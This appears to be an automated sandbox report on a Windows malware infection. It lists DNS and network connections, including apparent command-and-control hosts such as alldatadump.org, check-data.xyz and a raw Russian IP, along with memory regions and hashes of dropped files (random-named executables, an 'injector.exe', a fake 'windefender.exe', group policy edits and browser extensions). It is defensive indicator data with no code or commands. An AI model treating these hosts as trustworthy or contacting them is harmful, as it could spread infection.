US 8.8.8.8:53 72.239.69.13.in-addr.arpa udp
US 8.8.8.8:53 240.197.17.2.in-addr.arpa udp
DE 185.172.128.228:80 185.172.128.228 tcp
US 8.8.8.8:53 desktop-netinstaller-sub.osp.opera.software udp
US 8.8.8.8:53 autoupdate.geo.opera.com udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 239.249.30.184.in-addr.arpa udp
NL 185.26.182.123:443 autoupdate.geo.opera.com tcp
NL 185.26.182.123:443 autoupdate.geo.opera.com tcp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
US 8.8.8.8:53 features.opera-api2.com udp
US 8.8.8.8:53 download.opera.com udp
NL 82.145.216.15:443 features.opera-api2.com tcp
NL 185.26.182.122:443 download.opera.com tcp
US 8.8.8.8:53 79.121.231.20.in-addr.arpa udp
US 8.8.8.8:53 123.182.26.185.in-addr.arpa udp
US 8.8.8.8:53 121.217.145.82.in-addr.arpa udp
US 8.8.8.8:53 15.216.145.82.in-addr.arpa udp
US 8.8.8.8:53 122.182.26.185.in-addr.arpa udp
US 8.8.8.8:53 download5.operacdn.com udp
US 104.18.10.89:443 download5.operacdn.com tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 132.250.30.184.in-addr.arpa udp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
US 8.8.8.8:53 download3.operacdn.com udp
GB 2.16.27.215:443 download3.operacdn.com tcp
US 8.8.8.8:53 215.27.16.2.in-addr.arpa udp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 svc.iolo.com udp
US 20.157.87.45:80 svc.iolo.com tcp
US 8.8.8.8:53 b3d3dca1-28bb-4ffd-828a-80ac85234ad8.uuid.alldatadump.org udp
US 8.8.8.8:53 45.87.157.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 download.iolo.net udp
FR 185.93.2.248:443 download.iolo.net tcp
US 8.8.8.8:53 248.2.93.185.in-addr.arpa udp
RU 193.233.132.234:80 193.233.132.234 tcp
US 8.8.8.8:53 svc.iolo.com udp
US 20.157.87.45:80 svc.iolo.com tcp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 server8.alldatadump.org udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 8.8.8.8:53 stun2.l.google.com udp
NL 74.125.128.127:19302 stun2.l.google.com udp
US 162.159.129.233:443 cdn.discordapp.com tcp
BG 185.82.216.108:443 server8.alldatadump.org tcp
US 8.8.8.8:53 127.128.125.74.in-addr.arpa udp
US 8.8.8.8:53 233.129.159.162.in-addr.arpa udp
US 8.8.8.8:53 108.216.82.185.in-addr.arpa udp
US 8.8.8.8:53 carsalessystem.com udp
US 104.21.94.82:443 carsalessystem.com tcp
US 8.8.8.8:53 82.94.21.104.in-addr.arpa udp
US 8.8.8.8:53 westus2-2.in.applicationinsights.azure.com udp
US 20.9.155.148:443 westus2-2.in.applicationinsights.azure.com tcp
US 8.8.8.8:53 148.155.9.20.in-addr.arpa udp
BG 185.82.216.108:443 server8.alldatadump.org tcp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 service-domain.xyz udp
US 3.80.150.121:443 service-domain.xyz tcp
US 8.8.8.8:53 121.150.80.3.in-addr.arpa udp
US 8.8.8.8:53 11.97.55.23.in-addr.arpa udp
US 8.8.8.8:53 177.101.63.23.in-addr.arpa udp
US 8.8.8.8:53 clients2.google.com udp
GB 142.250.187.238:443 clients2.google.com tcp
US 8.8.8.8:53 clients2.googleusercontent.com udp
GB 172.217.16.225:443 clients2.googleusercontent.com tcp
US 8.8.8.8:53 67.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 238.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 225.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 10.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 server8.alldatadump.org udp
BG 185.82.216.108:443 server8.alldatadump.org tcp
GB 142.250.187.238:443 clients2.google.com tcp
US 8.8.8.8:53 api5.check-data.xyz udp
US 44.239.127.146:80 api5.check-data.xyz tcp
US 8.8.8.8:53 146.127.239.44.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp

Files

memory/2156-0-0x000001FD7AF80000-0x000001FD7AFB6000-memory.dmp

memory/2156-1-0x00007FF84CA60000-0x00007FF84D521000-memory.dmp

memory/2156-2-0x000001FD7D600000-0x000001FD7D610000-memory.dmp

memory/2156-3-0x000001FD7B360000-0x000001FD7B3BE000-memory.dmp

memory/2468-4-0x0000000000400000-0x0000000000408000-memory.dmp

memory/2468-5-0x0000000074A20000-0x00000000751D0000-memory.dmp

memory/2468-6-0x00000000052E0000-0x00000000052F0000-memory.dmp

memory/2156-7-0x00007FF84CA60000-0x00007FF84D521000-memory.dmp

C:\Users\Admin\Pictures\l6LSdyUHXm4SFBWhR2naUyoe.exe

MD5 5b423612b36cde7f2745455c5dd82577
SHA1 0187c7c80743b44e9e0c193e993294e3b969cc3d
SHA256 e0840d2ea74a00dcc545d770b91d9d889e5a82c7bedf1b989e0a89db04685b09
SHA512 c26a1e7e96dbd178d961c630abd8e564ef69532f386fb198eb20119a88ecab2fe885d71ac0c90687c18910ce00c445f352a5e8fbf5328f3403964f7c7802414c

C:\Users\Admin\Pictures\v1GloRmtlH7A4ZF27q5awSsA.exe

MD5 91a5c37b8ffaf4337e6a180b53cb3bc9
SHA1 f26e6a9a0469259358bf11d7520d97b1a1217d0d
SHA256 0a8a918a87480164a28ff60fb51ca3fc54afdf9ebce43343a8f2c05c2431ce46
SHA512 6d968aca48c66fd2207308aeeb5dfd3e9eec4a523a8fa31259352eee359018772b41095b87453bea548b45c3f35fc22a2855ab11a1269705839fde3c8439c294

memory/768-30-0x0000000001CA0000-0x0000000001DA0000-memory.dmp

memory/768-31-0x0000000001BB0000-0x0000000001C22000-memory.dmp

memory/768-32-0x0000000000400000-0x0000000001A40000-memory.dmp

C:\Users\Admin\Pictures\i5WHEvos3BIMKMpqbk2wODrZ.exe

MD5 749cb9cb3ce89a03fdd97a9aaf96e895
SHA1 73ecd478ace66e1dfb7aeed8ed061af48214a46f
SHA256 85aeb0eca144912f0713ac4e8392e2645a91bb4ba8e2ffa55e5bf834665170af
SHA512 ac0afac898ab53a3277b4d1aef90af246ca8596872a6a61bbf47817c1ea038fc4394094a4d14d2cc0aa94aeaf1435f9ccc7cf7143010ff581fd4256dc653bd31

memory/4592-43-0x0000000140000000-0x00000001408B7000-memory.dmp

memory/4592-44-0x0000000140000000-0x00000001408B7000-memory.dmp

memory/4592-45-0x00007FF800000000-0x00007FF800002000-memory.dmp

memory/4592-46-0x00007FF86AAD0000-0x00007FF86ACC5000-memory.dmp

memory/4592-48-0x00007FF86A020000-0x00007FF86A0DE000-memory.dmp

memory/4592-51-0x0000000140000000-0x00000001408B7000-memory.dmp

memory/4592-50-0x00007FF800030000-0x00007FF800031000-memory.dmp

memory/4592-49-0x0000000140000000-0x00000001408B7000-memory.dmp

memory/4592-47-0x0000000140000000-0x00000001408B7000-memory.dmp

memory/4592-52-0x0000000140000000-0x00000001408B7000-memory.dmp

memory/4592-53-0x0000000140000000-0x00000001408B7000-memory.dmp

C:\Windows\System32\GroupPolicy\gpt.ini

MD5 8ef9853d1881c5fe4d681bfb31282a01
SHA1 a05609065520e4b4e553784c566430ad9736f19f
SHA256 9228f13d82c3dc96b957769f6081e5bac53cffca4ffde0ba1e102d9968f184a2
SHA512 5ddee931a08cfea5bb9d1c36355d47155a24d617c2a11d08364ffc54e593064011dee4fea8ac5b67029cab515d3071f0ba0422bb76af492a3115272ba8feb005

C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe

MD5 7ea234dfc011f40047e769b15ebe661b
SHA1 5a779733891b290d45b3009eb4ceb17c41a2401d
SHA256 c7c0f3e7c270835c0af43a4103d9ef95f85f3ce48d7ab7863d1d3a2fae1847c8
SHA512 71f90fcd6f1c72ab8e9498ff811982db7dd0aa28bb384e8642b3dd75db7b699d853725930eba629e7fa27449bd876a70c8be2619ebc09f514ae06cde714bc9fd

memory/1756-72-0x0000000003A80000-0x0000000003E87000-memory.dmp

memory/1756-73-0x0000000000400000-0x0000000001DFD000-memory.dmp

memory/1756-74-0x0000000003E90000-0x000000000477B000-memory.dmp

memory/2164-86-0x0000000003A00000-0x0000000003E06000-memory.dmp

memory/3936-87-0x0000000004E80000-0x0000000004EB6000-memory.dmp

memory/3936-88-0x0000000005640000-0x0000000005C68000-memory.dmp

memory/2164-89-0x0000000000400000-0x0000000001DFD000-memory.dmp

memory/3936-90-0x0000000005000000-0x0000000005010000-memory.dmp

memory/2468-92-0x0000000074A20000-0x00000000751D0000-memory.dmp

memory/3936-91-0x0000000005CB0000-0x0000000005CD2000-memory.dmp

memory/3936-93-0x0000000074A20000-0x00000000751D0000-memory.dmp

memory/3936-94-0x0000000005000000-0x0000000005010000-memory.dmp

memory/3936-95-0x0000000005D50000-0x0000000005DB6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dnuisomx.nia.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3936-101-0x0000000005E30000-0x0000000005E96000-memory.dmp

memory/2468-106-0x00000000052E0000-0x00000000052F0000-memory.dmp

memory/3936-107-0x0000000005FA0000-0x00000000062F4000-memory.dmp

memory/768-109-0x0000000000400000-0x0000000001A40000-memory.dmp

memory/4936-110-0x0000000074A20000-0x00000000751D0000-memory.dmp

memory/4936-111-0x0000000004B50000-0x0000000004B60000-memory.dmp

memory/768-112-0x0000000001CA0000-0x0000000001DA0000-memory.dmp

memory/3936-114-0x0000000006460000-0x000000000647E000-memory.dmp

memory/4936-113-0x0000000004B50000-0x0000000004B60000-memory.dmp

memory/3936-115-0x00000000069D0000-0x0000000006A1C000-memory.dmp

memory/4592-116-0x0000000140000000-0x00000001408B7000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ulc.0.exe

MD5 513e1df3bd8755c988baf3f682d3abc0
SHA1 909fa3f20c167213d94c6edc50bb43672d8cb41e
SHA256 9f8af4317529d2b35ddafa1b74a2379695cf0c68ef2639141fe0e875692b9e9d
SHA512 c838f5520bbd320c53a7daa536eef16cc819abf509b973d570e93a7906c5dafa569e07a81c11b73637daf8ff8e03aa508ef0825f3e5a36c8d98b3764cadb4ba4

memory/4592-134-0x00007FF86AAD0000-0x00007FF86ACC5000-memory.dmp

memory/1572-136-0x0000000003650000-0x0000000003677000-memory.dmp

memory/1572-135-0x0000000001A70000-0x0000000001B70000-memory.dmp

memory/1572-137-0x0000000000400000-0x0000000001A19000-memory.dmp

memory/3936-138-0x0000000006920000-0x0000000006964000-memory.dmp

memory/3936-139-0x0000000007780000-0x00000000077F6000-memory.dmp

memory/3936-140-0x0000000007E80000-0x00000000084FA000-memory.dmp

memory/3936-141-0x0000000007820000-0x000000000783A000-memory.dmp

memory/3936-142-0x00000000079E0000-0x0000000007A12000-memory.dmp

memory/1756-144-0x0000000003A80000-0x0000000003E87000-memory.dmp

memory/3936-145-0x000000006F700000-0x000000006FA54000-memory.dmp

memory/3936-155-0x0000000007A20000-0x0000000007A3E000-memory.dmp

memory/3936-156-0x0000000007A40000-0x0000000007AE3000-memory.dmp

memory/3936-158-0x000000007F990000-0x000000007F9A0000-memory.dmp

memory/1756-157-0x0000000000400000-0x0000000001DFD000-memory.dmp

memory/3936-143-0x000000006FF80000-0x000000006FFCC000-memory.dmp

memory/3936-159-0x0000000005000000-0x0000000005010000-memory.dmp

memory/3936-160-0x0000000007B30000-0x0000000007B3A000-memory.dmp

memory/1572-161-0x0000000000400000-0x0000000001A19000-memory.dmp

memory/3936-162-0x0000000007BF0000-0x0000000007C86000-memory.dmp

memory/3936-163-0x0000000007B50000-0x0000000007B61000-memory.dmp

memory/4936-166-0x000000007F190000-0x000000007F1A0000-memory.dmp

memory/4936-167-0x000000006FF80000-0x000000006FFCC000-memory.dmp

memory/4936-168-0x000000006F700000-0x000000006FA54000-memory.dmp

C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe

MD5 fb2fa33d9a08da7e95b553ff8487e328
SHA1 5f0329ccc8dfed784353ec12fac5efc80384c1ee
SHA256 d8d7763ece24d6ffb9544171f5af36f3fc3bca7fba3f872752adf0dce521b661
SHA512 6be950c2ca60153eb33357ceadf8fbf2cf9019bf7103d050cc772b3403f486d268d7e079df21ef8333c5bf7753bf5c7ec42ca04bae09e47c76d955cac29478d9

C:\Users\Admin\AppData\Local\Temp\Opera_installer_2404191404507553208.dll

MD5 0415cb7be0361a74a039d5f31e72fa65
SHA1 46ae154436c8c059ee75cbc6a18ccda96bb2021d
SHA256 bb38a8806705980ee3e9181c099e8d5c425e6c9505a88e5af538ca6a48951798
SHA512 f71c2b9e1559aa4eb2d72f852ef9807c781d4a7b96b8e0c2c53b895885319146bd43aa6e4223d43159f3d40bc60704206404dc034500e47fca0a94e53b60239e

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 d95bb2433432984a05ff6febc5952649
SHA1 c34d05f432a6d998f946896ae41bcef758b1398d
SHA256 aba97c4dab0eecba7b5d330995c60f4ea4268c2edb63201b30ffbb453ba2ce87
SHA512 62af186de5e31aea06e990adac6e836ded9d279bd01018ef9f4eaea751c29ef6c844a43114df35e2ef8a383c7dae973ba99b09eabd6df213842cbfcbcbca5e4b

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports\settings.dat

MD5 1de04f96914b420ce2fced5336765d97
SHA1 c60bd7f83cad273e1d98aecaba41e39457778482
SHA256 496f940ab9a8c051bb48f7779e20da440e698c03a50fe9f7753d4249d59752b8
SHA512 bec1c056bae68423b50dddbf622ed1f84f0150a7da867ce91320066d4be1ab47d6402e367f352fa17eba24616ad9ceaf6fe78481cf254c062b8b5a594e487527

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 a6ea7bfcd3aac150c0caef765cb52281
SHA1 037dc22c46a0eb0b9ad4c74088129e387cffe96b
SHA256 f019af2e5e74cdf13c963910500f9436c66b6f2901f5056d72f82310f20113b9
SHA512 c8d2d373b48a26cf6eec1f5cfc05819011a3fc49d863820ad07b6442dd6d5f64e27022a9e4c381eb58bf7f6b19f8e77d508734ff803073ec2fb32da9081b6f23

memory/768-242-0x0000000000400000-0x0000000001A40000-memory.dmp

memory/1756-251-0x0000000000400000-0x0000000001DFD000-memory.dmp

memory/2164-295-0x0000000000400000-0x0000000001DFD000-memory.dmp

memory/4364-296-0x0000000000400000-0x0000000001DFD000-memory.dmp

memory/4804-297-0x0000000000400000-0x0000000001DFD000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404511\opera_package

MD5 5014156e9ffbb75d1a8d5fc09fabdc42
SHA1 6968d1b5cec3039e53bbbedeee22e2d43d94c771
SHA256 7a01e11e1830ba3c154e5a6c383da15938b1e48f89a2fe4045cdd260924b6802
SHA512 bfc5c44881d0fa7bcbccfd530d874fa624adec50e1a16063a72de12876d2db10ca5edd6fa841ea63e9deca3ff2adf54065f50719fe051d41de92bb68edba4016

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 f389cb4db9d1eba54d7892fb5467be38
SHA1 ac8a660e5a758462069f8b08504ef4cf25802000
SHA256 4f03fe3f5b727ec12bf8a2beb1ddf00bfc6cbd3bcca6f49510f4fad5734bb939
SHA512 989c3ae4ae4f7c5d207cc1cdd2c16983e37eb9600f222c5367dad7607c4a1186c7b69d74ca55fe8e8c0137a1f73ef6bf0138cfd946122df9fb1388ba633efdb0

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 3d086a433708053f9bf9523e1d87a4e8
SHA1 b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28
SHA256 6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69
SHA512 931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 6cfd1c02ada13c47a6c0e4384016798f
SHA1 66d60265c0d3d2db38c9cad2357915c3d6078889
SHA256 c3803e966366657282f4008f1700fe2cac66402c84b5e10e7d703e29c8a182f0
SHA512 098f50dc8bd17fc9de3123df2ba2b7318b6bf7a1e9b01794cd7990530ce67909d0e3eac0ee9d283ef88ebb104578478f5905c5c76ee9168765690356a722e400

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404511\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe

MD5 15d8c8f36cef095a67d156969ecdb896
SHA1 a1435deb5866cd341c09e56b65cdda33620fcc95
SHA256 1521c69f478e9ced2f64b8714b9e19724e747cd8166e0f7ab5db1151a523dda8
SHA512 d6f48180d4dcb5ba83a9c0166870ac00ea67b615e749edf5994bc50277bf97ca87f582ac6f374c5351df252db73ee1231c943b53432dbb7563e12bbaf5bb393a

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404511\assistant\assistant_installer.exe

MD5 976bc8e5fe65f9bb56831e20f1747150
SHA1 f9e7f5628aaaabed9939ef055540e24590a9ccfb
SHA256 f53c916ccf3d24d6793227283de2db0f6cc98a2275413851807cc080643d21a0
SHA512 2858e7e08418b170b21b599afb02236d0480d35a5605de142f10976489e01daf2ad80df0f09c2eb38bc5a971336d1f6aa9909c520bcdb18e9c9a8e903379dcd9

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404511\assistant\dbgcore.dll

MD5 9ebb919b96f6f94e1be4cdc6913ef629
SHA1 31e99ac4fba516f82b36bd81784e8d518b32f9df
SHA256 fdae21127deb16eb8ba36f2493d2255f4cb8ab4c18e8bd8ba5e587f5a7ecd119
SHA512 a1b42f7d2896da270bb3c80cf9b88c4b4f1491084e7aa7760eeea5533b26f041dc79b21d5ffd2bba2221fe118e0a8d912e170f24fd895c9315b1ee9c7adfe700

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404511\assistant\dbghelp.dll

MD5 544255258f9d45b4608ccfd27a4ed1dd
SHA1 571e30ceb9c977817b5bbac306366ae59f773497
SHA256 3b02fc85602e83059f611c658e3cad6bc59c3c51214d4fe7e31f3ac31388dd68
SHA512 2093da881fa90eec2b90d1ca6eaaff608fe16ac612571a7fd5ed94dd5f7ff7e5c1e8c862bab0a228850829527886473e3942abd23a81d10cab8f9baad2cc7664

memory/4804-507-0x0000000000400000-0x0000000001DFD000-memory.dmp

memory/4364-511-0x0000000000400000-0x0000000001DFD000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 cd959341129ee16e6ba3e3e9509aa1cc
SHA1 233784d46d17530a7a3bb6b851923e97d3ee0980
SHA256 601262fd2f916223f6993b69f9f3625f03d8e7e8e6c9a3b0ea4bd31cbd5c70fc
SHA512 5cf39fe719011762408990cd9c50fc02b25998aeeb9c72e5f272c6952f0cf4559be6129f6accab1868124a05777ba726df3f33cac450d520d06a7d95e85c581b

memory/4364-518-0x0000000000400000-0x0000000001DFD000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ulc.3.exe

MD5 397926927bca55be4a77839b1c44de6e
SHA1 e10f3434ef3021c399dbba047832f02b3c898dbd
SHA256 4f07e1095cc915b2d46eb149d1c3be14f3f4b4bd2742517265947fd23bdca5a7
SHA512 cf54136b977fc8af7e8746d78676d0d464362a8cfa2213e392487003b5034562ee802e6911760b98a847bddd36ad664f32d849af84d7e208d4648bd97a2fa954

memory/768-563-0x0000000000400000-0x0000000001A40000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 bd77d3f5f5f5b6d6a9f831a75e674fdd
SHA1 9e0d39064f4ebf0755ae05bb41b6c098d7ed8566
SHA256 0004703d28163c6eaf7b8d5fd7e1981a234e528a4d691df79819b76883f0f75a
SHA512 43c5d1a6acd675fae1f268146cd0c19712dd2661ebf78fa81c06cdfeac72d461d7d1b4d7eb613145d55fad1648945d1dd5fa5a1520a8b6c3687dabdd2c342a1b

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 2d2019a34d1bf37267d209a16145d96f
SHA1 b6685e89f667a479b48eaf8418e6313124f0c328
SHA256 e16b1a0ce463db313e8bc9c7b0102aa33c15ba86226fb470b12db962f4cf6f25
SHA512 5c4ba51f43cad2d6f0fdf93bd97156beeaa435e733b1d8f5b1e94c0603fecf278c3474a3ade03217b148bd7b293d8c7f3df38d0bd07c8022c8cf80c57b78ee3d

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

MD5 d98e33b66343e7c96158444127a117f6
SHA1 bb716c5509a2bf345c6c1152f6e3e1452d39d50d
SHA256 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1
SHA512 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

C:\Users\Admin\Pictures\R84XgkwYCGHfoB3THGDD5mNW.exe

MD5 aaa56797070369ad346fbd9bb6cc5e8b
SHA1 a1d01943f0a354d3a000628262671254ca6a91b8
SHA256 9d7d08ac35f0113f7c814d257bf88b8222975aaa0a3fdeda88ac7185dbc50905
SHA512 e69d25a158567c6bce6e9450de17d0814b9b9c11f4bb31e5dcc3e8b4378062cc7e31da625f6ba4a2280b393034a6c832a0fc0a1e16364dc7e8c8146de245b5be

memory/2604-673-0x0000000000400000-0x0000000001DFD000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS7625.tmp\Install.exe

MD5 e77964e011d8880eae95422769249ca4
SHA1 8e15d7c4b7812a1da6c91738c7178adf0ff3200f
SHA256 f200984380d291051fc4b342641cd34e7560cadf4af41b2e02b8778f14418f50
SHA512 8feb3dc4432ec0a87416cbc75110d59efaf6504b4de43090fc90286bd37f98fc0a5fb12878bb33ac2f6cd83252e8dfd67dd96871b4a224199c1f595d33d4cade

memory/4860-676-0x0000000010000000-0x0000000013BC3000-memory.dmp

memory/3204-682-0x0000000000400000-0x00000000008AD000-memory.dmp

memory/3204-712-0x0000000000400000-0x00000000008AD000-memory.dmp

C:\Windows\windefender.exe

MD5 8e67f58837092385dcf01e8a2b4f5783
SHA1 012c49cfd8c5d06795a6f67ea2baf2a082cf8625
SHA256 166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa
SHA512 40d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec

memory/2604-739-0x0000000000400000-0x0000000001DFD000-memory.dmp

memory/2560-749-0x0000000000400000-0x00000000008DF000-memory.dmp

memory/2604-765-0x0000000000400000-0x0000000001DFD000-memory.dmp

memory/3512-766-0x0000000000400000-0x00000000008DF000-memory.dmp

memory/2604-774-0x0000000000400000-0x0000000001DFD000-memory.dmp

memory/5440-779-0x0000000010000000-0x0000000013BC3000-memory.dmp

C:\Windows\system32\GroupPolicy\Machine\Registry.pol

MD5 cdfd60e717a44c2349b553e011958b85
SHA1 431136102a6fb52a00e416964d4c27089155f73b
SHA256 0ee08da4da3e4133e1809099fc646468e7156644c9a772f704b80e338015211f
SHA512 dfea0d0b3779059e64088ea9a13cd6b076d76c64db99fa82e6612386cae5cda94a790318207470045ef51f0a410b400726ba28cb6ecb6972f081c532e558d6a8

memory/2604-801-0x0000000000400000-0x0000000001DFD000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 aa8dd57ca30513418d88cce7123f75a3
SHA1 5c2f9b0ff200174b92816767b77b154713fb9f71
SHA256 7f622bb24b1025d73781d0c35cbd3e3f88d78944cadd8240f45785e385253e2f
SHA512 25a9b324a6e65ca2e4e757d354f126e0b04b68bd75d541a014657cde98e49a925aa2d269ad21a5e10d6a8be75a83ef03c138c8e6d1ebfd6b25f41e0874b516ab

C:\Windows\system32\GroupPolicy\gpt.ini

MD5 a62ce44a33f1c05fc2d340ea0ca118a4
SHA1 1f03eb4716015528f3de7f7674532c1345b2717d
SHA256 9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA512 9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732

memory/2604-839-0x0000000000400000-0x0000000001DFD000-memory.dmp

memory/3512-840-0x0000000000400000-0x00000000008DF000-memory.dmp

memory/2604-846-0x0000000000400000-0x0000000001DFD000-memory.dmp

C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

MD5 e30e3a5b5d1c4e01fc04a5f640489258
SHA1 d45f8ee1f500d3f525cc02fd991607187009ebd2
SHA256 1e7bc119fa3771f6a792cb4cb6e1f9e11e946fbb1ddd70fc46e59bc0ee97b3f9
SHA512 7d8eb050127c24247f84adda42c396cf317c3f973c692dfe32bdabeffd16c33f6ca67c653ffa1964d3b88306f8fe616c7a751b6d43018b8649c3d0cc05f9b27a

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json

MD5 238d2612f510ea51d0d3eaa09e7136b1
SHA1 0953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256 801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA512 2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json

MD5 2a1e12a4811892d95962998e184399d8
SHA1 55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA256 32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512 bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json

MD5 0b1cf3deab325f8987f2ee31c6afc8ea
SHA1 6a51537cef82143d3d768759b21598542d683904
SHA256 0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA512 5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json

MD5 bd6b60b18aee6aaeb83b35c68fb48d88
SHA1 9b977a5fbf606d1104894e025e51ac28b56137c3
SHA256 b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55
SHA512 3500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ryfa7gh4.default-release\prefs.js

MD5 5c02b5c4f94d718edcd4c0e6fd296aa6
SHA1 8be9f3f2b7b9c91e7be2d918c3e90893aa7b7e2b
SHA256 d9a5cde26a454372adc408ae242dd05110a90c3c48cf873169e524d905b66d06
SHA512 96e5495f0519947ca35a91b5f36aec2583d4d333e0b8e75e4850ec160aabfeaf17a85f89c72e76ed956c8c16edfa79931411a92809bbb2e81c8b682f7c98af51

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 37578b05f30079dfab9402d840965c77
SHA1 c386b95d64a15f1f4a3c6906446556d303713940
SHA256 8ed96ba8583756f2527ef70bff78cb9bf2afb7d7c1a5214e321feeef245522a7
